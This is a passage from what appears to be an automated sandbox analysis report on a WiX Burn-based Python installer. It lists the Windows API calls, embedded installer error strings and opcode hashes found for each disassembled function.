                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Create
                                                                                                                                  • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
                                                                                                                                  • API String ID: 359002179-2517785395
                                                                                                                                  • Opcode ID: 79ff16137ec836a93eada0e1ecfc3be3f0b68158ed18ea7f20a319680cc03a92
                                                                                                                                  • Instruction ID: 2ebb48bc5bb0e9748781f4b7f3c58fa10d3d84ff77fc21b5e2343981b61582ee
                                                                                                                                  • Opcode Fuzzy Hash: 79ff16137ec836a93eada0e1ecfc3be3f0b68158ed18ea7f20a319680cc03a92
                                                                                                                                  • Instruction Fuzzy Hash: 4A41A035900618FFCF22AEA1DC06EAF7BB6AF80315F10446FF90161162D739AA609B59
                                                                                                                                  APIs
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004B09EB
                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004B09F3
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004B0A81
                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004B0AAC
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004B0B01
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                  • String ID: HJ$csm
                                                                                                                                  • API String ID: 1170836740-828589626
                                                                                                                                  • Opcode ID: 36567980b3d7de27660ebda6930738364ac281c40d860ca580780711af1d89d3
                                                                                                                                  • Instruction ID: 7a2122d1b577d220ed1df917b7349552d092e98ccac94d822a537761c8e8917b
                                                                                                                                  • Opcode Fuzzy Hash: 36567980b3d7de27660ebda6930738364ac281c40d860ca580780711af1d89d3
                                                                                                                                  • Instruction Fuzzy Hash: 0541A734A003089BCF10DF59C884ADFBBB4BF54319F14855AE8159B392D779E905CBA4
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0048F9D1
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0048F9DE
                                                                                                                                  Strings
                                                                                                                                  • Resume, xrefs: 0048F945
                                                                                                                                  • Failed to read Resume value., xrefs: 0048F967
                                                                                                                                  • %ls.RebootRequired, xrefs: 0048F8BE
                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 0048F8D5
                                                                                                                                  • Failed to open registration key., xrefs: 0048F93A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                  • Opcode ID: 21bd9ce24660b4c70477ab4a40d03066c17dfe90a12638d210ee9d64a8425c31
                                                                                                                                  • Instruction ID: 09792c974626be8c20b5d1a292d29008c1bc543cdb3e9bc32d14a57e3f878e06
                                                                                                                                  • Opcode Fuzzy Hash: 21bd9ce24660b4c70477ab4a40d03066c17dfe90a12638d210ee9d64a8425c31
                                                                                                                                  • Instruction Fuzzy Hash: 70416DB1904119FFCB11AF95C991BADBBA4EF00314F21487BE814A7321D3799E45DB89
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(004EC6EC,00000000,?,?,?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?), ref: 004C094D
                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,004EC6E4,?,0049427F,00000000,Setup), ref: 004C09F1
                                                                                                                                  • GetLastError.KERNEL32(?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?,?,?), ref: 004C0A01
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?), ref: 004C0A3B
                                                                                                                                    • Part of subcall function 00482EE7: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00483031
                                                                                                                                  • LeaveCriticalSection.KERNEL32(004EC6EC,?,?,004EC6E4,?,0049427F,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00485572,?), ref: 004C0A94
                                                                                                                                  Strings
                                                                                                                                  • rUH, xrefs: 004C096A
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\logutil.cpp, xrefs: 004C0A20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\logutil.cpp$rUH
                                                                                                                                  • API String ID: 4111229724-3155766997
                                                                                                                                  • Opcode ID: 08c4b281bbc43b591dd6651717f5c0de680577fbc1085453e8991756b924091f
                                                                                                                                  • Instruction ID: 01a0e1ed1a4835eca09533cbfa3612ce7f20c02befbb59a0522e16782209ae73
                                                                                                                                  • Opcode Fuzzy Hash: 08c4b281bbc43b591dd6651717f5c0de680577fbc1085453e8991756b924091f
                                                                                                                                  • Instruction Fuzzy Hash: 11318279900365EFDB61AFB19C86F6F3668EB14754F04022BF900AA261C779DE009B9C
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 004A38A2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open@16
                                                                                                                                  • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.$feclient.dll
                                                                                                                                  • API String ID: 3613110473-656185529
                                                                                                                                  • Opcode ID: 569acba8ec6d36f1e25c2e2bca7d9f346bce8998e866fa9f8e66471df810ea79
                                                                                                                                  • Instruction ID: 4d2088d108db7b653f038f6d2c6f65b2f5972e81fbb592fb01887b615cc2952b
                                                                                                                                  • Opcode Fuzzy Hash: 569acba8ec6d36f1e25c2e2bca7d9f346bce8998e866fa9f8e66471df810ea79
                                                                                                                                  • Instruction Fuzzy Hash: 1831C3B2D01216BBCF15AE95CD41AAFB7A8EF21706F10412FF80166250F7B89F50DB99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                  • API String ID: 0-660234312
                                                                                                                                  • Opcode ID: 49decf0922a12841df66e0509e220bcf0fc5065afe2fa94e513ed31252443d72
                                                                                                                                  • Instruction ID: 9b00d1ede99a62ef6a547739eb287a279c6698fec34b814e365c37309d5c8996
                                                                                                                                  • Opcode Fuzzy Hash: 49decf0922a12841df66e0509e220bcf0fc5065afe2fa94e513ed31252443d72
                                                                                                                                  • Instruction Fuzzy Hash: AF31D032940129BBCF119A95CD55F9EBBA9DB00720F210677F820B6290DB789E50DBD9
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(004E1228,00000000,00000017,004E1238,?,?,00000000,00000000,?,?,?,?,?,004ADCAA,00000000,00000000), ref: 004AD6BC
                                                                                                                                  Strings
                                                                                                                                  • WixBurn, xrefs: 004AD6E7
                                                                                                                                  • Failed to set BITS job to foreground., xrefs: 004AD73D
                                                                                                                                  • Failed to set notification flags for BITS job., xrefs: 004AD70E
                                                                                                                                  • Failed to create IBackgroundCopyManager., xrefs: 004AD6C8
                                                                                                                                  • Failed to set progress timeout., xrefs: 004AD726
                                                                                                                                  • Failed to create BITS job., xrefs: 004AD6F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                  • API String ID: 542301482-468763447
                                                                                                                                  • Opcode ID: 70435f5830aed7356b332650ee7c76a02429be938f657ca12165d2e0970c7082
                                                                                                                                  • Instruction ID: dd589decfaf6e5780580b7c0ed1c1ef99944e2200dc53e47c31d20a48e5d1853
                                                                                                                                  • Opcode Fuzzy Hash: 70435f5830aed7356b332650ee7c76a02429be938f657ca12165d2e0970c7082
                                                                                                                                  • Instruction Fuzzy Hash: 5D31C535E40255AFC715CB69C845EBFBBB4EF59711B10015AEA06FB360C738EC018B99
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 004C6202
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C620F
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 004C6256
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C628A
                                                                                                                                  • CloseHandle.KERNEL32(00000000,c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp,000000C8,00000000), ref: 004C62BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                  • String ID: %ls.R$c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp
                                                                                                                                  • API String ID: 3160720760-1562451261
                                                                                                                                  • Opcode ID: 24eda87f60cc836e8a26b8a0d9dd3a57191be246dadd0a9edba60313f2193cd5
                                                                                                                                  • Instruction ID: f0097ad0d11e524e88f82d826e4d8d907420f368a6e161a93cf463f6e4a9000d
                                                                                                                                  • Opcode Fuzzy Hash: 24eda87f60cc836e8a26b8a0d9dd3a57191be246dadd0a9edba60313f2193cd5
                                                                                                                                  • Instruction Fuzzy Hash: 8831FB76901224BBD7609F55CC45F6F7AA4EF45731F1282ABFE11AB2C0D7789C0087A8
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,004AD425,?), ref: 004AD148
                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,004AD425,?), ref: 004AD15C
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004AD1A1
                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 004AD1B4
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 004AD1BD
                                                                                                                                  Strings
                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 004AD1DE
                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 004AD201
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                  • API String ID: 2608678126-3424578679
                                                                                                                                  • Opcode ID: e1f9fb61cce03b9d7305f6ff31f64c469219f9d066e2a7a75f67a425a373099c
                                                                                                                                  • Instruction ID: 63a969e0037c43bee4f7654bb2ab2f0c79662f0741f59619e55823b297321b56
                                                                                                                                  • Opcode Fuzzy Hash: e1f9fb61cce03b9d7305f6ff31f64c469219f9d066e2a7a75f67a425a373099c
                                                                                                                                  • Instruction Fuzzy Hash: 9731D43290021ABFDB019F94DC45FEEBBB8BF15325F14826AF521A3691C778DA508B94
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00489C66
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0048A971,00000100,000002C0,000002C0,00000100), ref: 00489C86
                                                                                                                                  • GetLastError.KERNEL32(?,0048A971,00000100,000002C0,000002C0,00000100), ref: 00489C91
                                                                                                                                  Strings
                                                                                                                                  • Failed to format variable string., xrefs: 00489C71
                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00489CFD
                                                                                                                                  • Failed to set directory search path variable., xrefs: 00489CC2
                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00489CE7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                  • API String ID: 1811509786-2966038646
                                                                                                                                  • Opcode ID: f934fff9df6c81199a6db94affd64640c6595b2e62d41021b546acdeb4f9d3af
                                                                                                                                  • Instruction ID: fe43e4a6cd7ab0b9f37bdc17440fcddeab9c3e518740bca6f20cc0f99985f73f
                                                                                                                                  • Opcode Fuzzy Hash: f934fff9df6c81199a6db94affd64640c6595b2e62d41021b546acdeb4f9d3af
                                                                                                                                  • Instruction Fuzzy Hash: 7F110436800924F7CB127A969D02FAEBA65AF00720F25461BFC0177290972F9E10A7DD
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00496ED9,?,?,00000000,crypt32.dll,00000000,00000001), ref: 004969AB
                                                                                                                                  • GetLastError.KERNEL32(?,00496ED9,?,?,00000000,crypt32.dll,00000000,00000001), ref: 004969B5
                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,00496ED9,?,?,00000000,crypt32.dll,00000000,00000001), ref: 004969F4
                                                                                                                                  • GetLastError.KERNEL32(?,00496ED9,?,?,00000000,crypt32.dll,00000000,00000001), ref: 004969FE
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\core.cpp, xrefs: 004969DC, 00496A25
                                                                                                                                  • Failed to get cache thread exit code., xrefs: 00496A2F
                                                                                                                                  • Failed to wait for cache thread to terminate., xrefs: 004969E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$c:\agent\_work\138\s\src\burn\engine\core.cpp
                                                                                                                                  • API String ID: 3686190907-1666294930
                                                                                                                                  • Opcode ID: aa07ea1d5c83f5a20867ac31d8e6da78a55b1a84e302740f46b4ab88671c03fe
                                                                                                                                  • Instruction ID: 6b4fa54acebff23711e827dc38a65040f57535e291ebaf0673bf086064aff859
                                                                                                                                  • Opcode Fuzzy Hash: aa07ea1d5c83f5a20867ac31d8e6da78a55b1a84e302740f46b4ab88671c03fe
                                                                                                                                  • Instruction Fuzzy Hash: 15115270640306FBEF009F659D06F6F7AA8AB01755F21407BB844E6290DB79DA009B6D
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0049F73D
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0049F84A
                                                                                                                                  Strings
                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0049F7A9
                                                                                                                                  • Failed to set source path for payload., xrefs: 0049F7D9
                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0049F809
                                                                                                                                  • UX denied while trying to set source on embedded payload: %ls, xrefs: 0049F7BF
                                                                                                                                  • Failed to set source path for container., xrefs: 0049F82F
                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0049F757
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                  • API String ID: 3168844106-4121889706
                                                                                                                                  • Opcode ID: 81c612a081af0956be664a0a238de5978e6e16f436553c7bbc8460bc7c608243
                                                                                                                                  • Instruction ID: 6481909530db79c8fda0bb31e48a862e04a4fc41ae151fd8fb146167f1b0fe77
                                                                                                                                  • Opcode Fuzzy Hash: 81c612a081af0956be664a0a238de5978e6e16f436553c7bbc8460bc7c608243
                                                                                                                                  • Instruction Fuzzy Hash: 9E31C332A00210EB8F51EB95C84AE5BBBA89F50724715417BF804E7351DBBCEE0587AD
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004872C4
                                                                                                                                  Strings
                                                                                                                                  • Failed to format escape sequence., xrefs: 0048735E
                                                                                                                                  • Failed to append escape sequence., xrefs: 00487357
                                                                                                                                  • Failed to append characters., xrefs: 00487350
                                                                                                                                  • Failed to copy string., xrefs: 00487378
                                                                                                                                  • []{}, xrefs: 004872EE
                                                                                                                                  • [\%c], xrefs: 00487323
                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 004872DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                  • API String ID: 1659193697-3250950999
                                                                                                                                  • Opcode ID: a3bfa0ee6276f69e173801f7735cb0265b7f928ba493f07d3ff59d3cdb255700
                                                                                                                                  • Instruction ID: d6e4b4d726aea7b4dd285ca0cb2b2c46c81a6c55652f03e29eec51c9fbbcd0fe
                                                                                                                                  • Opcode Fuzzy Hash: a3bfa0ee6276f69e173801f7735cb0265b7f928ba493f07d3ff59d3cdb255700
                                                                                                                                  • Instruction Fuzzy Hash: 4321F536D08614F7CB11BAA68D52FAEA7689B00718F30096BFD00B6181DB7DDE41E39D
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,004CB4F0,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,004A665C,?,00000001,?,00000000), ref: 004A5AD1
                                                                                                                                  Strings
                                                                                                                                  • feclient.dll, xrefs: 004A5AC7, 004A5BEF
                                                                                                                                  • Failed to insert execute action., xrefs: 004A5B26
                                                                                                                                  • Failed to copy target product code., xrefs: 004A5C02
                                                                                                                                  • Failed to plan action for target product., xrefs: 004A5B7C
                                                                                                                                  • Failed grow array of ordered patches., xrefs: 004A5B6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                  • API String ID: 1825529933-3477540455
                                                                                                                                  • Opcode ID: e1145bfbed5e1cc1290089cd6c90a3c49f3b4665cbcd94ae3cf3d945852803cb
                                                                                                                                  • Instruction ID: 9ca241000dbf12ff2fb9edfd024d5f401738b5d97ec3c69e744d46d6a9028575
                                                                                                                                  • Opcode Fuzzy Hash: e1145bfbed5e1cc1290089cd6c90a3c49f3b4665cbcd94ae3cf3d945852803cb
                                                                                                                                  • Instruction Fuzzy Hash: 288115B560071ADFCB14CF58C980AAA77A5FF19324B11866AFD158B352D738EC11CFA8
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,004970FA,000000B8,0000001C,00000100), ref: 004A90E7
